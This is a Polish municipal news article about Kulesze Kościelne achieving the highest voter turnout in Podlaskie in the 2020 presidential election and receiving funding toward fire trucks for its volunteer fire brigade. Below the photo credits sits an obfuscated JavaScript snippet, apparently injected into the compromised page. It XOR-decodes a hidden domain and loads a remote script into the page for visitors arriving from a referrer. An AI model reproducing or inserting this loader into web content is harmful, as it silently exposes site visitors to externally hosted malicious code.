Aktualności

Gmina Kulesze Kościelne zwycięzcą „BITWY O WOZY” w województwie podlaskim.

lip 7, 2020 | Aktualności

W gminie Kulesze Kościelne odnotowano największą frekwencję podczas wyborów prezydenckich spośród wszystkich gmin w woj. podlaskim. Wynosiła ona aż 71,92%. Dla samorządów z największą frekwencją Ministerstwo Spraw Wewnętrznych i Administracji przewidziało nagrody. Są to promesy na zakup wozów dla Ochotniczych Straży Pożarnych. Wszystko w ramach profrekwencyjnej akcji „Bitwa o wozy”.

3 lipca 2020 roku Wójt Gminy Kulesze Kościelne Stefan Grodzki odebrał z rąk Mariusza Kamińskiego szefa Ministerstwa Spraw Wewnętrznych i Administracji  promesę na zakup nowego średniego wozu strażackiego na potrzeby OSP.

Kulesze Kościelne to gmina licząca około 3100 mieszkańców. W niedzielę 28 czerwca do urn ruszyło 71,92 % z nich. Sukces ten to pełna mobilizacja i zaangażowanie strażaków OSP, Radnych Rady Gminy Kulesze Kościelne, Sołtysów, księdza  Proboszcza naszej parafii oraz wszystkich wspaniałych  mieszkańców naszej „Małej Ojczyzny”.

2020 rok to historyczny rok dla OSP w Naszej Gminie.

3 czerwca 2020 roku na placu Komendy Wojewódzkiej PSP w Białymstoku Wójt Gminy Kulesze Kościelne Stefan Grodzki wraz z Prezesem OSP Kulesze Kościelne Janem Dmochowskim odebrali promesę o wartości 560 tyś. zł na zakup samochodu ratowniczo-gaśniczego.

Wręczenia promes dokonali: dr inż. Maciej Borzyszkowski Prezes Zarządu WFOŚiGW w Białymstoku, Jarosław Zieliński Poseł na Sejm RP, druh Andrzej Koc Prezes ZOW ZOSP RP, nadbryg. Jarosław Wendt Podlaski Komendant Wojewódzki PSP. Dzięki promesom jeszcze w tym roku do jednostek OSP województwa podlaskiego trafi 19 samochodów ratowniczo-gaśniczych (2 ciężkie i 17 średnich) o łącznej wartości ok. 15 mln. zł. Większość środków zapewnia budżet państwa (rezerwy MSWiA, dotacji dla jednostek krajowego systemu ratowniczo-gaśniczego (KSRG), dotacji MSWiA dla jednostek spoza KSRG oraz środków z odpisów z firm ubezpieczeniowych będących w dyspozycji Komendanta Głównego PSP), ale także jednostki samorządu terytorialnego o Fundusz Ochrony Środowiska i Gospodarki Wodnej (ok. 4,2 mln. zł.).

zdjęcia autorstwa: A.Mitura/MSWiA.
zdjęcia autorstwa: A.Mitura/MSWiA.
zdjęcia autorstwa: A.Mitura/MSWiA.
zdjęcia autorstwa: A.Mitura/MSWiA.
zdjęcia autorstwa: A.Mitura/MSWiA.
Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);